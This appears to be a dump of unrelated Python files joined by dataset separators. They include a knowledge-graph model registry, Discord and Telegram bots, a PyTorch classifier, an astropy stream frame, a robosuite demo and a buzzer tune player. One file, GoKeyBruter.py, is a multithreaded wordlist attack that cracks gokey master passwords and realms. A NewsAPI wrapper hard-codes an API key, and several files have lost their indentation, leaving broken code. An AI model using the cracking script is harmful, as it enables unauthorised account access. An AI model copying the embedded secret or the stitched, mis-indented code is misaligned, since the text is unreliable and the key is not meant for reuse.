real-valued score representing the plausibility of a triple $(h,r,t) \in \mathbb{K}$ given the embeddings for the
entities and relations. In general, a larger score indicates a higher plausibility. The interpretation of the
score value is model-dependent, and usually it cannot be directly interpreted as a probability.
""" # noqa: D205, D400
from typing import Set, Type
from class_resolver import Resolver, get_subclasses
from .base import EntityEmbeddingModel, EntityRelationEmbeddingModel, Model, MultimodalModel, _OldAbstractModel
from .multimodal import ComplExLiteral, DistMultLiteral
from .nbase import ERModel, _NewAbstractModel
from .resolve import make_model, make_model_cls
from .unimodal import (
ComplEx,
ConvE,
ConvKB,
DistMult,
ERMLP,
ERMLPE,
HolE,
KG2E,
MuRE,
NTN,
PairRE,
ProjE,
RESCAL,
RGCN,
RotatE,
SimplE,
StructuredEmbedding,
TransD,
TransE,
TransH,
TransR,
TuckER,
UnstructuredModel,
)
# Public API of this package (controls ``from ... import *`` and serves as
# the canonical model list); keep in sync with the imports above.
__all__ = [
    # Base Models
    'Model',
    '_OldAbstractModel',
    'EntityEmbeddingModel',
    'EntityRelationEmbeddingModel',
    '_NewAbstractModel',
    'ERModel',
    'MultimodalModel',
    # Concrete Models
    'ComplEx',
    'ComplExLiteral',
    'ConvE',
    'ConvKB',
    'DistMult',
    'DistMultLiteral',
    'ERMLP',
    'ERMLPE',
    'HolE',
    'KG2E',
    'MuRE',
    'NTN',
    'PairRE',
    'ProjE',
    'RESCAL',
    'RGCN',
    'RotatE',
    'SimplE',
    'StructuredEmbedding',
    'TransD',
    'TransE',
    'TransH',
    'TransR',
    'TuckER',
    'UnstructuredModel',
    # Utils
    'model_resolver',
    'make_model',
    'make_model_cls',
]
# All concrete interaction models, discovered by walking the subclass tree
# of ``Model`` and skipping abstract base implementations.
_MODELS: Set[Type[Model]] = set(
    filter(lambda cls: not cls._is_base_model, get_subclasses(Model))  # type: ignore
)

model_resolver = Resolver(classes=_MODELS, base=Model)  # type: ignore
| StarcoderdataPython |
3577595 | <reponame>richard-clifford/GoKeyBruter<filename>GoKeyBruter.py<gh_stars>0
import threading
import subprocess
import argparse
# Shared progress counter; mutated by every worker thread without a lock.
counter = 0
def brute_realm(args, password):
    # Try *password* against every realm listed in args.realm_list; return
    # the gokey output on the first realm whose output matches the expected
    # plaintext (args.p), or '' when no realm matches.
    password = password.strip()
    with open(args.realm_list) as realm_list:
        for r in realm_list:
            r = r.strip()
            if(args.v):
                print "[*] Trying [%s:%s] " % (r,password,)
            output = run_process(args.g, r, password)
            if(output.strip() == args.p):
                print "[+] Found the master password! [%s:%s]" % (password.strip(), r)
                return output
    return ''
def run_process(go_bin, realm, password):
    # Invoke the gokey binary once for (realm, password); return its
    # stripped stdout.
    output = subprocess.check_output([go_bin, "-r", realm, "-p", password.strip()])
    return output.strip()
def generate_table(args, realm):
global counter
counter = 0
cracked = False
master_password = ''
file = open(args.w, 'r')
line = file.readlines(counter)
while cracked == False and counter < len(line)-1:
counter = counter + 1
if(counter % 10000 == 0):
print "[+] %d checked." % (counter)
if(args.brute_realm):
output = brute_realm(args, line[counter].strip())
else:
output = run_process(args.g, realm, line[counter].strip()).strip()
if(output == args.p):
master_password = output
print "[+] Found the master password! [%s:%s]" % (output, realm.strip())
cracked = True
break
return master_password
def main():
    # Parse the CLI arguments and launch args.t brute-force worker threads.
    parser = argparse.ArgumentParser(description='Arguments for GoKeyBruter')
    parser.add_argument('-g', required=True, help='The GoKey Binary Location')
    parser.add_argument('-r', help='The GoKey "Realm"')
    parser.add_argument('-p', help='The GoKey Plaintext Password')
    parser.add_argument('-v', help='Set Verbosity On/Off')
    parser.add_argument('-w', required=True, help='Custom wordlist (Currently Required)')
    parser.add_argument('-t', type=int, required=True, help='Threads')
    parser.add_argument('--brute-realm', help='Attempt to Brute Force the Realm')
    parser.add_argument('--realm-list', help='Attempt to Brute Force the Realm')
    parser.add_argument('--master-password', help='If the --brute-realm flag is set you can use this flag to just brute the realm if you already know the Master Password but need the Realm')
    arguments = parser.parse_args()
    realm = ''
    if arguments.r:
        realm = arguments.r
    else:
        if arguments.brute_realm:
            realm = arguments.realm_list
    # NOTE(review): every thread runs the same wordlist against the same
    # realm, so threads duplicate rather than split the work -- confirm
    # this is intentional.
    for x in range(arguments.t):
        threading.Thread(name='Thread-{}'.format(x), target=generate_table, args=(arguments,realm,)).start()
if __name__ == '__main__':
main() | StarcoderdataPython |
4981524 | <filename>ext/youtube.py<gh_stars>0
import discord
import os
import concurrent.futures
import urllib.request
import json
from discord.ext import commands, tasks
from utils._errors import SocialAlreadyImplemented, SocialNotFound, SocialDoesNotExist
from sqlite3 import IntegrityError
from datetime import datetime
class YouTube(commands.Cog):
    # Cog that monitors a set of YouTube channels (stored in the bot's
    # ``social`` DB table) and announces new uploads in a configured
    # Discord channel. Comments are used instead of docstrings on the
    # commands because discord.py surfaces callback docstrings as help text.
    def __init__(self, bot):
        self.bot = bot
        self.api_key = os.environ['YOUTUBE_API_KEY']
        self.base_video_url = 'https://www.youtube.com/watch?v='
        self.base_search_url = 'https://www.googleapis.com/youtube/v3/search?'
        # channel title -> last announced video URL (prevents re-announcing)
        self.announced = dict()
        # Defer channel loading until the bot is ready.
        self.bot.loop.create_task(self.updateChannels())
    async def updateChannels(self):
        # Load the monitored channel IDs from the DB, then start the poller.
        await self.bot.wait_until_ready()
        async with self.bot.db.execute("SELECT youtube FROM social") as cursor:
            rows = await cursor.fetchall()
        try:
            self.channels = [i[0] for i in rows if i[0] != None]
        except IndexError:
            self.channels = list()
        print("YouTube Plugin:",self.channels)
        self.check_for_new_video.start()
    async def cog_command_error(self, ctx, error):
        # Gets original attribute of error (unwrap CommandInvokeError).
        error = getattr(error, "original", error)
        if isinstance(error, SocialDoesNotExist):
            await ctx.send("That Channel is not in the database!")
        elif isinstance(error, SocialNotFound):
            await ctx.send("Could not find Channel or Data API Rate Limit Reached. To convert username -> channel ID use this converter: https://socialnewsify.com/get-channel-id-by-username-youtube/")
        elif isinstance(error, SocialAlreadyImplemented):
            await ctx.send("That Channel is already in the database!")
    #Able to handle ~30 channels per day (YouTube Data API quota budget).
    @tasks.loop(seconds=28800)
    async def check_for_new_video(self):
        # Poll every monitored channel; announce any video not yet announced.
        channels = self.channels
        if len(channels) == 0:
            return
        for channelID in channels:
            # The blocking urllib call runs in a thread pool to keep the
            # event loop responsive.
            with concurrent.futures.ThreadPoolExecutor() as pool:
                result = await self.bot.loop.run_in_executor(pool, self.get_latest_video, channelID)
            #Youtube Data API rate limit reached (or other fetch failure)
            if not result:
                return
            video_link, channel_title = result
            try:
                if video_link == self.announced[channel_title]:
                    print("Already Announced")
                    continue
            except KeyError:
                pass
            channel = self.bot.get_channel(int(os.environ["ANNOUNCEMENT-CHANNEL-YOUTUBE"]))
            # Announcement template is read from disk on every announcement.
            with open('./customize/announce_youtube.txt','r') as textFile:
                text = textFile.read().format(user=channel_title,url=video_link)
            await channel.send(text)
            self.announced[channel_title] = video_link
    @check_for_new_video.before_loop
    async def before_check(self):
        # Don't start polling until the gateway connection is ready.
        await self.bot.wait_until_ready()
    def get_latest_video(self,channel_id):
        # Blocking helper: return (latest video URL, channel title) for
        # *channel_id*, or False on any error (e.g. API quota exhausted).
        try:
            first_url = self.base_search_url+'key={}&channelId={}&part=snippet,id&order=date&maxResults=1'.format(self.api_key, channel_id)
            video_links = []
            url = first_url
            inp = urllib.request.urlopen(url)
            resp = json.load(inp)
            channelTitle = resp['items'][0]['snippet']['channelTitle']
            for i in resp['items']:
                if i['id']['kind'] == "youtube#video":
                    video_links.append(self.base_video_url + i['id']['videoId'])
            try:
                next_page_token = resp['nextPageToken']
                url = first_url + '&pageToken={}'.format(next_page_token)
            except:
                return (video_links[0], channelTitle)
            return (video_links[0], channelTitle)
        except Exception as e:
            return False
    def validate(self, channel_id : str) -> bool:
        # Blocking helper: return the channel title when *channel_id*
        # resolves via the Data API, else False.
        try:
            first_url = self.base_search_url+'key={}&channelId={}&part=snippet,id&order=date&maxResults=1'.format(self.api_key, channel_id)
            url = first_url
            inp = urllib.request.urlopen(url)
            resp = json.load(inp)
            channelTitle = resp['items'][0]['snippet']['channelTitle']
        except Exception as e:
            print(e)
            return False
        else:
            return channelTitle if channelTitle else False
    @commands.guild_only()
    @commands.has_permissions(administrator=True)
    @commands.command(name="addyt", description="Command to add Channel", aliases=['addyoutube','ay'])
    async def addyt(self, ctx, channel_id : str):
        # Validate the channel via the API, then persist it and start
        # monitoring it.
        await ctx.trigger_typing()
        with concurrent.futures.ThreadPoolExecutor() as pool:
            result = await self.bot.loop.run_in_executor(pool, self.validate, channel_id)
        if not result:
            raise SocialNotFound
        sql = 'INSERT INTO social(youtube) VALUES (?)'
        try:
            async with self.bot.db.execute(sql, (channel_id,)) as cursor:
                await self.bot.db.commit()
        except IntegrityError:
            # UNIQUE constraint hit: the channel is already stored.
            raise SocialAlreadyImplemented
        else:
            self.channels.append(channel_id)
            embed = discord.Embed(
                title="Action Successful",
                description=f"Channel Added: **{result}**",
                colour=discord.Colour.red()
            )
            return await ctx.send(embed=embed)
    @commands.guild_only()
    @commands.has_permissions(administrator=True)
    @commands.command(name='removeyt',description='Command to remove channel',aliases=['ry','removeyoutube'])
    async def removeyt(self, ctx, channel_id : str):
        # Remove a monitored channel from both the DB and the live list.
        if channel_id not in self.channels:
            raise SocialDoesNotExist
        sql = 'DELETE FROM social WHERE youtube=?'
        async with self.bot.db.execute(sql, (channel_id,)) as cursor:
            await self.bot.db.commit()
        self.channels.remove(channel_id)
        embed = discord.Embed(
            title="Action Successful",
            description=f"Channel Removed: **{channel_id}**",
            colour=discord.Colour.from_rgb(255,255,255)
        )
        await ctx.send(embed=embed)
    @commands.guild_only()
    @commands.has_permissions(administrator=True)
    @commands.command(name='listyt', description='Command that lists all channels being Monitored', aliases=['ly','listyoutube'])
    async def listyt(self, ctx):
        # Show every monitored channel ID in an embed.
        if len(self.channels) == 0:
            return await ctx.send("There are currently no Channels being monitored. Add them via the `addyt` command")
        mapped = '\n'.join(map(str,self.channels))
        embed = discord.Embed(
            title="List of Channels currently being Monitored",
            description=f"`{mapped}`",
            colour=discord.Colour.dark_red(),
            timestamp=datetime.utcnow()
        )
        embed.set_footer(text=f"{ctx.author.name}#{ctx.author.discriminator}", icon_url=ctx.author.avatar_url)
        return await ctx.send(embed=embed)
# discord.py extension entry point: called by ``bot.load_extension``.
def setup(bot):
    bot.add_cog(YouTube(bot))
| StarcoderdataPython |
11218943 | <gh_stars>0
import torch
import collections
class Classifier(torch.nn.Module):
    """Configurable convolutional classifier for 32x32 RGB inputs.

    ``conv_layer_info`` is a sequence of ``(out_channels, pool_size,
    dropout_p)`` triples; ``dense_layer_info`` a sequence of ``(width,
    dropout_p)`` pairs.  The final layer always produces 10 logits.
    """

    def __init__(self, conv_layer_info, dense_layer_info, batch_norm = False):
        super(Classifier, self).__init__()

        # ---- convolutional feature extractor ----
        feature_stages = collections.OrderedDict()
        in_channels = 3
        side = 32
        for stage, (out_channels, pool_size, p_drop) in enumerate(conv_layer_info):
            feature_stages['conv_{}'.format(stage)] = torch.nn.Conv2d(
                in_channels, out_channels, 3, padding=1)
            if batch_norm:
                feature_stages['conv_batch_norm_{}'.format(stage)] = torch.nn.BatchNorm2d(out_channels)
            feature_stages['conv_relu_{}'.format(stage)] = torch.nn.ReLU()
            if pool_size > 1:
                feature_stages['conv_maxpool_{}'.format(stage)] = torch.nn.MaxPool2d(pool_size)
                side = side // pool_size
            # A Dropout module is registered even when p_drop == 0.0
            # (it is a no-op at p=0); this keeps the layer layout stable.
            if p_drop >= 0.0:
                feature_stages['conv_dropout_{}'.format(stage)] = torch.nn.Dropout(p_drop)
            in_channels = out_channels
        self.conv_layers = torch.nn.Sequential(feature_stages)

        # Flattened size of the extractor output, used in forward().
        self.pre_linear_shape = in_channels * side * side

        # ---- fully connected head ----
        head = collections.OrderedDict()
        in_features = self.pre_linear_shape
        for stage, (width, p_drop) in enumerate(dense_layer_info):
            head['lin_linear_{}'.format(stage)] = torch.nn.Linear(in_features, width)
            if batch_norm:
                head['lin_batch_norm_{}'.format(stage)] = torch.nn.BatchNorm1d(width)
            head['lin_relu_{}'.format(stage)] = torch.nn.ReLU()
            if p_drop > 0.0:
                head['lin_dropout_{}'.format(stage)] = torch.nn.Dropout(p_drop)
            in_features = width
        head['final_linear'] = torch.nn.Linear(in_features, 10)
        self.hidden_layers = torch.nn.Sequential(head)

    def forward(self, x):
        """Extract features, flatten, and return the 10 class logits."""
        features = self.conv_layers(x)
        flattened = features.view(-1, self.pre_linear_shape)
        return self.hidden_layers(flattened)
| StarcoderdataPython |
9781329 | import os
from telegram.ext import Filters, MessageHandler, Updater
import bot_config
from data import data
import model
# Characters allowed in a model query (digits + Latin + Cyrillic + space).
WHITELIST = '0123456789abcdefghijklmnopqrstuvwxyzабвгдеёжзийклмнопрстуфхцчшщъыьэюя ' # space is included in whitelist
# NOTE(review): BLACKLIST is defined but never used in this module.
BLACKLIST = '!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~\''
# Populated by the __main__ start-up code below.
seq2seq, sess = None, None
def echo(bot, update):
    """Telegram message handler: normalise the incoming text, run the
    seq2seq model on it and reply with the decoded answer."""
    raw_text = update.message.text
    print('Conversation query:', raw_text)
    # Keep only whitelisted characters, then clip to the model's maximum
    # query length (in words).
    cleaned = ''.join(ch for ch in raw_text.lower() if ch in WHITELIST)
    cleaned = ' '.join(cleaned.split(' ')[:data.limit['maxq']])
    predicted = seq2seq.predict_one(sess, cleaned)
    # Decode tokens until the end-of-sequence marker.
    words = []
    for token in predicted:
        if token == 'end_id':
            break
        words.append(token)
    answer = ' '.join(words).capitalize()
    print('Conversation reply:', answer)
    update.message.reply_text(answer)
if __name__ == '__main__':
    # Wire up the Telegram bot and start long-polling for messages.
    updater = Updater(token=bot_config.TOKEN)
    updater.dispatcher.add_handler(MessageHandler(Filters.text, echo))
    updater.start_polling()
    # NOTE(review): polling starts before the model below finishes loading,
    # so a message arriving during start-up hits ``seq2seq = None`` --
    # confirm this window is acceptable.
    # prepare and load the seq2seq model and its vocabulary
    metadata, idx_q, idx_a = data.load_data(PATH='data/')
    w2idx = metadata['w2idx']  # dict word 2 index
    idx2w = metadata['idx2w']  # list index 2 word
    print('Loading vocab done:', 'shapes', idx_q.shape, idx_a.shape)
    # Reserve two extra vocabulary slots for the decoder start/end markers.
    vocab_size = len(idx2w)
    start_id = vocab_size
    end_id = vocab_size + 1
    w2idx['start_id'] = start_id
    w2idx['end_id'] = end_id
    idx2w += ['start_id', 'end_id']
    # Force CPU-only execution.
    os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
    seq2seq = model.Model(w2idx, idx2w, True)
    sess = seq2seq.restore()
    print('Start listening...')
    updater.idle()
| StarcoderdataPython |
1813538 | <gh_stars>0
import ordered_set
from typing import Iterable
# Re-export the sentinel ordered_set uses to mean "the full slice [:]".
SLICE_ALL = ordered_set.SLICE_ALL
# monkey patching the OrderedSet implementation
def insert(self, index, key):
    """Insert *key* at position *index*, shifting later elements right.

    No-op when *key* is already present.  Negative indices count from the
    end and the index is clamped into the valid range, mirroring
    ``list.insert``.  Meant to be monkey-patched onto
    ``ordered_set.OrderedSet``.
    """
    if key in self.map:
        return
    # Clamp the index into [0, len(items)] the same way list.insert does.
    size = len(self.items)
    if index < 0:
        index = max(size + index, 0)
    else:
        index = min(index, size)
    self.items.insert(index, key)
    # Every element at or after the insertion point moves one slot right.
    for existing, pos in self.map.items():
        if pos >= index:
            self.map[existing] = pos + 1
    self.map[key] = index
def pop(self, index=None):
    """Remove and return the last element of an OrderedSet, or the element
    at *index* when one is given.

    This implementation is meant for the OrderedSet from the ordered_set
    package only (it is monkey-patched onto that class below).
    """
    if not self.items:
        raise KeyError('Set is empty')
    def _delete(pos):
        value = self.items[pos]
        del self.items[pos]
        del self.map[value]
        return value
    if index is None:
        # Tail removal: no stored position needs adjusting.
        return _delete(-1)
    n = len(self.items)
    if index < 0:
        index += n
    if not 0 <= index < n:
        raise IndexError('assignement index out of range')
    value = _delete(index)
    # Shift down the positions recorded after the removed slot.
    for elem, pos in self.map.items():
        if pos >= index and pos > 0:
            self.map[elem] = pos - 1
    return value
def __setitem__(self, index, item):
if isinstance(index, slice):
raise KeyError('Item assignation using slices is not yet supported '
'for {}'.format(self.__class__.__name__))
if index < 0:
index = len(self.items) + index
if index < 0:
raise IndexError('assignement index out of range')
self.pop(index)
self.insert(index, item)
def __getitem__(self, index):
if isinstance(index, slice) and index == SLICE_ALL:
return self.copy()
elif isinstance(index, Iterable):
return self.subcopy(self.items[i] for i in index)
elif isinstance(index, slice) or hasattr(index, "__index__"):
result = self.items[index]
if isinstance(result, list):
return self.subcopy(result)
else:
return result
else:
raise TypeError("Don't know how to index an OrderedSet by %r" % index)
def subcopy(self, subitems):
    """Build a new instance of the same class from *subitems*.

    Kept as a separate method mainly so subclasses can override it.
    """
    return type(self)(subitems)
# Attach the implementations above to the third-party OrderedSet class.
ordered_set.OrderedSet.insert = insert
ordered_set.OrderedSet.pop = pop
ordered_set.OrderedSet.__setitem__ = __setitem__
ordered_set.OrderedSet.__getitem__ = __getitem__
ordered_set.OrderedSet.subcopy = subcopy
| StarcoderdataPython |
1620315 | <gh_stars>1-10
from haystack import indexes
from nuremberg.photographs.models import Photograph
class PhotographId(indexes.SearchIndex, indexes.Indexable):
    """Haystack search index over ``Photograph`` models."""
    # Main full-text document field, rendered from a search template.
    text = indexes.CharField(document=True, use_template=True)
    highlight = indexes.CharField(model_attr='description')
    material_type = indexes.CharField(default='Photograph', faceted=True)
    grouping_key = indexes.FacetCharField(facet_for='grouping_key') # not really a facet, just an exact key
    slug = indexes.CharField(model_attr='slug', indexed=False)
    title = indexes.CharField(model_attr='title')
    literal_title = indexes.CharField(model_attr='description', null=True)
    thumb_url = indexes.CharField(model_attr='thumb_url', indexed=False, null=True)
    date = indexes.CharField(model_attr='year_taken', faceted=True, null=True)
    date_sort = indexes.DateTimeField(model_attr='date', null=True)
    date_year = indexes.CharField(model_attr='date_year', faceted=True, null=True)
    source = indexes.CharField(default='Photographic Archive', faceted=True, null=True)
    # Defaults to 1 -- presumably photographs count as single-page documents.
    total_pages = indexes.IntegerField(default=1, null=True)
    def get_model(self):
        """Return the Django model this index is built over."""
        return Photograph
    def prepare_grouping_key(self, photo):
        """Return a per-photo unique grouping key."""
        # This is a hack to group transcripts but not documents in a single query.
        # Transcripts get a group key, documents get a unique key.
        # This can be changed to make grouping work on volume or something else.
        return 'Photograph_{}'.format(photo.id)
| StarcoderdataPython |
9619552 | import requests
class News():
    """Minimal wrapper around the newsapi.org v2 REST API.

    NOTE: the methods below deliberately take no ``self``/``cls`` -- they are
    used as namespace-style functions and always invoked as ``News.method(...)``.
    NOTE(review): the API key is hard-coded; prefer loading it from an
    environment variable or a config file.
    """
    apikey = "8a6b8c7a93c04c969ee984d8dc2d196f"
    base_url = "https://newsapi.org/v2/"
    def make_request(url, q="", country=""):
        """GET *url* with the API key plus optional ``q``/``country`` filters.

        Returns ``{'success': True, 'j': <parsed JSON>}`` on HTTP 200, or
        ``{'success': False, 'message': <reason>}`` otherwise.
        """
        p = {
            'apiKey': News.apikey,
        }
        if country != "":
            p['country'] = country
        if q != "":
            p['q'] = q
        try:
            r = requests.get(url, params=p)
        except requests.exceptions.RequestException:
            return {
                'success': False,
                'message': 'Error getting response'
            }
        # Bug fix: status_code is an int, so the previous comparison against
        # the *string* '401' never matched and quota errors fell through to
        # the generic 'Network problem' branch.
        if r.status_code == 401:
            return {
                'success': False,
                'message': 'Key limit exceeded'
            }
        elif r.status_code == 200:
            # Parse the body only after the status check: error responses
            # are not guaranteed to contain valid JSON.
            return {
                'success': True,
                'j': r.json()
            }
        else:
            return {
                'success': False,
                'message': 'Network problem'
            }
    def process_query(url, q="", country=""):
        """Fetch *url* and reduce the JSON payload to a list of article dicts
        with ``title``, ``url`` and ``description`` keys.
        """
        response = News.make_request(url, q, country)
        if not response['success']:
            return response
        payload = response['j']
        articles = []
        try:
            for article in payload['articles']:
                articles.append({
                    'title': article['title'],
                    'url': article['url'],
                    'description': article['description']
                })
            return {
                'success': True,
                'a': articles
            }
        except (ValueError, KeyError):
            # Unexpected payload shape.
            return {
                'success': False,
                'message': 'Error getting response'
            }
    #DO NOT USE THIS
    def get_news(q):
        """Full-text search on the /everything endpoint."""
        return News.process_query("{}everything".format(News.base_url), q)
    def get_world_top_headlines(q=""):
        """Top headlines for the US, optionally filtered by *q*."""
        return News.process_query("{}top-headlines".format(News.base_url), q, 'us')
    def get_india_top_headlines(q=""):
        """Top headlines for India, optionally filtered by *q*."""
        return News.process_query("{}top-headlines".format(News.base_url), q, 'in')
def main():
    """Manual smoke test: read a query from stdin and print Indian headlines."""
    s=input()
    n=News.get_india_top_headlines(s)
    if n['success']:
        for article in n['a']:
            print(article)
    # Second input() keeps a console window open until the user presses Enter.
    input()
if __name__ == '__main__':
main() | StarcoderdataPython |
5172563 | # coding: utf-8
""" Astropy coordinate class for the Sagittarius coordinate system """
from __future__ import division, print_function
# Third-party
import numpy as np
import astropy.units as u
import astropy.coordinates as coord
from astropy.coordinates import frame_transform_graph
from astropy.coordinates.matrix_utilities import matrix_transpose
__all__ = ["GD1"]
class GD1(coord.BaseCoordinateFrame):
    """
    A Heliocentric spherical coordinate system defined by the orbit
    of the GD1 stream, as described in
    Koposov et al. 2010 (see: `<http://arxiv.org/abs/0907.1085>`_).
    For more information about this class, see the Astropy documentation
    on coordinate frames in :mod:`~astropy.coordinates`.
    Parameters
    ----------
    representation : :class:`~astropy.coordinates.BaseRepresentation` or None
        A representation object or None to have no data (or use the other keywords)
    phi1 : angle_like, optional, must be keyword
        The longitude-like angle corresponding to GD1's orbit.
    phi2 : angle_like, optional, must be keyword
        The latitude-like angle corresponding to GD1's orbit.
    distance : :class:`~astropy.units.Quantity`, optional, must be keyword
        The Distance for this object along the line-of-sight.
    pm_phi1_cosphi2 : :class:`~astropy.units.Quantity`, optional, must be keyword
        The proper motion in the longitude-like direction corresponding to
        the GD1 stream's orbit.
    pm_phi2 : :class:`~astropy.units.Quantity`, optional, must be keyword
        The proper motion in the latitude-like direction perpendicular to the
        GD1 stream's orbit.
    radial_velocity : :class:`~astropy.units.Quantity`, optional, must be keyword
        The radial velocity of this object along the line-of-sight.
    """
    default_representation = coord.SphericalRepresentation
    default_differential = coord.SphericalCosLatDifferential
    frame_specific_representation_info = {
        coord.SphericalRepresentation: [
            coord.RepresentationMapping('lon', 'phi1'),
            coord.RepresentationMapping('lat', 'phi2'),
            coord.RepresentationMapping('distance', 'distance')],
    }
    _default_wrap_angle = 180*u.deg
    def __init__(self, *args, **kwargs):
        # Wrap longitudes into (-180, 180] deg by default so the stream
        # coordinate is contiguous across the 0 deg boundary.
        wrap = kwargs.pop('wrap_longitude', True)
        super().__init__(*args, **kwargs)
        if wrap and isinstance(self._data, (coord.UnitSphericalRepresentation,
                                            coord.SphericalRepresentation)):
            self._data.lon.wrap_angle = self._default_wrap_angle
# Rotation matrix as defined in the Appendix of Koposov et al. (2010);
# used below as the static ICRS -> GD1 transformation matrix.
R = np.array([[-0.4776303088, -0.1738432154, 0.8611897727],
              [0.510844589, -0.8524449229, 0.111245042],
              [0.7147776536, 0.4930681392, 0.4959603976]])
@frame_transform_graph.transform(coord.StaticMatrixTransform, coord.ICRS, GD1)
def icrs_to_gd1():
    """ Compute the transformation matrix from ICRS spherical to
    heliocentric GD1 coordinates.
    """
    return R
@frame_transform_graph.transform(coord.StaticMatrixTransform, GD1, coord.ICRS)
def gd1_to_icrs():
    """ Compute the transformation matrix from heliocentric GD1 coordinates to
    ICRS spherical.
    """
    return matrix_transpose(icrs_to_gd1())
| StarcoderdataPython |
215515 | <reponame>melfm/robosuite
"""
Script to showcase domain randomization functionality.
"""
import robosuite.utils.macros as macros
from robosuite.controllers import load_controller_config
from robosuite.utils.input_utils import *
from robosuite.wrappers import DomainRandomizationWrapper, GymImageDomainRandomizationWrapper
from robosuite.wrappers.domain_randomization_wrapper import DEFAULT_DYNAMICS_ARGS, DEFAULT_LIGHTING_ARGS, DEFAULT_CAMERA_ARGS, DEFAULT_COLOR_ARGS
from IPython import embed;
# We'll use instance randomization so that entire geom groups are randomized together
macros.USING_INSTANCE_RANDOMIZATION = True
if __name__ == "__main__":
# Create dict to hold options that will be passed to env creation call
options = {}
# print welcome info
print("Welcome to robosuite v{}!".format(suite.__version__))
print(suite.__logo__)
# Choose environment and add it to options
options["env_name"] = 'Lift'
# If a multi-arm environment has been chosen, choose configuration and appropriate robot(s)
options["robots"] = 'Jaco'
# Choose controller
controller_name = "OSC_POSE"
# Load the desired controller
options["controller_configs"] = load_controller_config(default_controller=controller_name)
# Help message to user
print()
print("Press \"H\" to show the viewer control panel.")
# initialize the task
env = suite.make(
**options,
has_renderer=True,
has_offscreen_renderer=False,
ignore_done=True,
use_camera_obs=False,
camera_names="agentview",
render_camera="nearfrontview",
control_freq=20,
hard_reset=False, # TODO: Not setting this flag to False brings up a segfault on macos or glfw error on linux
)
leave_out_color_geoms = ['cube', 'sphere', 'gripper', 'robot']
use_color_geoms = []
for g in env.sim.model.geom_names:
include = True
for lo in leave_out_color_geoms:
if lo.lower() in g.lower():
include = False
if include:
use_color_geoms.append(g)
color_args = DEFAULT_COLOR_ARGS
color_args['geom_names'] = use_color_geoms
color_args['local_rgb_interpolation'] = .3
color_args['local_material_interpolation'] = .3
color_args['randomize_texture_images'] = True
dynamics_args = DEFAULT_DYNAMICS_ARGS
camera_args = DEFAULT_CAMERA_ARGS
lighting_args = DEFAULT_LIGHTING_ARGS
# Get action limits
low, high = env.action_spec
for re in range(20):
env = GymImageDomainRandomizationWrapper(env,
randomize_dynamics=True,
dynamics_randomization_args=dynamics_args,
randomize_camera=True,
camera_randomization_args=camera_args,
randomize_color=True,
color_randomization_args=color_args,
randomize_lighting=True,
lighting_randomization_args=lighting_args,
randomize_on_reset=False,
randomize_every_n_steps=0)
env.reset()
for e in range(5):
for i in range(40):
action = np.random.uniform(low, high)
obs, reward, done, _ = env.step(action)
env.render()
env.reset()
#env.modders[0].change_default_texture('table_visual', np.random.randint(len(env.modders[0].textures)))
| StarcoderdataPython |
4883933 | <gh_stars>10-100
#
# This particular test was coded for the GHI Electronics G30 Development
# Board: https://www.ghielectronics.com/catalog/product/555
#
import pyb
from rtttl import RTTTL
import songs
# G30DEV: buzzer is driven by timer 3, channel 1.
buz_tim = pyb.Timer(3, freq=440)
buz_ch = buz_tim.channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.BUZZER, pulse_width=0)
# Y2 on pyboard
# buz_tim = pyb.Timer(8, freq=440)
# buz_ch = buz_tim.channel(2, pyb.Timer.PWM, pin=pyb.Pin('Y2'), pulse_width=0)
pwm = 50 # PWM duty cycle in percent; reduce this to reduce the volume
def play_tone(freq, msec):
    """Sound *freq* Hz for *msec* ms; a non-positive *freq* is a rest."""
    print('freq = {:6.1f} msec = {:6.1f}'.format(freq, msec))
    if freq > 0:
        buz_tim.freq(freq)
        buz_ch.pulse_width_percent(pwm)
    # 90% of the duration with the tone on, then a short silent gap so
    # consecutive identical notes stay distinguishable.
    on_ms = int(msec * 0.9)
    off_ms = int(msec * 0.1)
    pyb.delay(on_ms)
    buz_ch.pulse_width_percent(0)
    pyb.delay(off_ms)
def play(tune):
    """Play every note of an RTTTL *tune*; Ctrl-C silences the buzzer."""
    try:
        for frequency, duration in tune.notes():
            play_tone(frequency, duration)
    except KeyboardInterrupt:
        # Make sure the buzzer is switched off when interrupted.
        play_tone(0, 0)
def play_song(search):
    """Look up a song by *search* in the bundled songs module and play it."""
    play(RTTTL(songs.find(search)))
# play songs from songs.py
play_song('Entertainer')
# play songs directly from an RTTTL string
play(RTTTL('Monty Python:d=8,o=5,b=180:d#6,d6,4c6,b,4a#,a,4g#,g,f,g,g#,4g,f,2a#,p,a#,g,p,g,g,f#,g,d#6,p,a#,a#,p,g,g#,p,g#,g#,p,a#,2c6,p,g#,f,p,f,f,e,f,d6,p,c6,c6,p,g#,g,p,g,g,p,g#,2a#,p,a#,g,p,g,g,f#,g,g6,p,d#6,d#6,p,a#,a,p,f6,f6,p,f6,2f6,p,d#6,4d6,f6,f6,e6,f6,4c6,f6,f6,e6,f6,a#,p,a,a#,p,a,2a#'))
| StarcoderdataPython |
# Methods: envelhecer (grow older), engordar (gain weight), emagrecer (lose weight), crescer (grow).
# Note: by default, for each year the person ages while younger than 21, they should grow 0.5 cm.
class Pessoa:
    """A person with a name, age (years), weight (kg) and height (cm)."""

    def __init__(self, nome, idade, peso, altura):
        self.nome, self.idade, self.peso, self.altura = nome, idade, peso, altura

    def envelhecer(self, anos):
        """Age by *anos* years; while younger than 21 the person also grows
        0.5 cm per year, with growth capped at age 20.
        """
        if self.idade < 21:
            # min() caps the growth years exactly as the original nested
            # conditional did: growth stops once the age reaches 20.
            self.altura += min(anos, 20 - self.idade) * 0.5
        self.idade += anos

    def engordar(self, kg):
        """Gain *kg* kilograms."""
        self.peso += kg

    def emagrecer(self, kg):
        """Lose *kg* kilograms."""
        self.peso -= kg

    def crescer(self, tamanho):
        """Grow by *tamanho* centimeters."""
        self.altura += tamanho

    def mostrar(self):
        """Print a summary of the person's current measurements."""
        print(f'Seja bem vindo {self.nome}, vamos analisar: ')
        print(f'Sua idade é de {self.idade} anos.')
        print(f'Seu peso é de {self.peso} kilos.')
        print(f'Sua altura é de {self.altura}!')
# Demo: create a person, show the initial state, apply every mutator, show again.
cliente1 = Pessoa('Felipe', 14, 79.5, 176.4)
cliente1.mostrar()
cliente1.envelhecer(14)
cliente1.emagrecer(5.4)
cliente1.crescer(5)
cliente1.mostrar()
| StarcoderdataPython |
